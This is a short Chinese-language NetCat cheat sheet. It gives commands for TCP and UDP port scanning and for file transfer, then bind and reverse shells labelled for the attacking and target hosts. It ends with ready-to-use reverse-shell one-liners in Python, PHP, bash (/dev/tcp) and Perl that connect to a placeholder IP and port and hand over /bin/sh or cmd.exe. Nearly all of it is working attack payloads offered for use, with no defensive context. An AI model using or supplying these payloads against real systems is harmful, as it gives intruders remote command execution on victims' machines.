NetCat使用指南

nc -v {ip} {port}                 // 扫描单个 TCP 端口
nc -v -z {ip} {start_port} - {end_port}     //扫描多个 TCP 端口 
nc -v -u {ip} {port}                 // 扫描单个 UDP 端口
nc -v -u -z {ip} {start_port} - {end_port}     //扫描多个 UDP 端口 
nc -v -w {second} {start_port} - {end_port}     //设置停留时间

nc {ip} {port} < {file}     // 传输端
nc -l -p {port} > {file}     // 接收端

nc {ip} {port}                 // 攻击主机
nc -lvp {port} -e {/bash/sh|cmd.exe}     // 目标主机

nc -lvp {port}                 // 攻击主机
nc {ip} {port} -e {/bash/sh|cmd.exe}     // 目标主机

python -c 'import socket, subprocess, os;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2);p=subprocess.call(["{/bin/sh|cmd.exe}","-i"]);'

php -r '$sock=fsockopen("{ip}",{port});exec("{/bin/sh|cmd.exe} -i <&3 >&3 2>&3");'

bash -i>&/dev/tcp/{ip}/{port} 0>&1

perl -e 'use Socket;$i="{ip}";$p={port};socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));if(connect(S, sockaddr_in($p, inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' // 只能使用单引号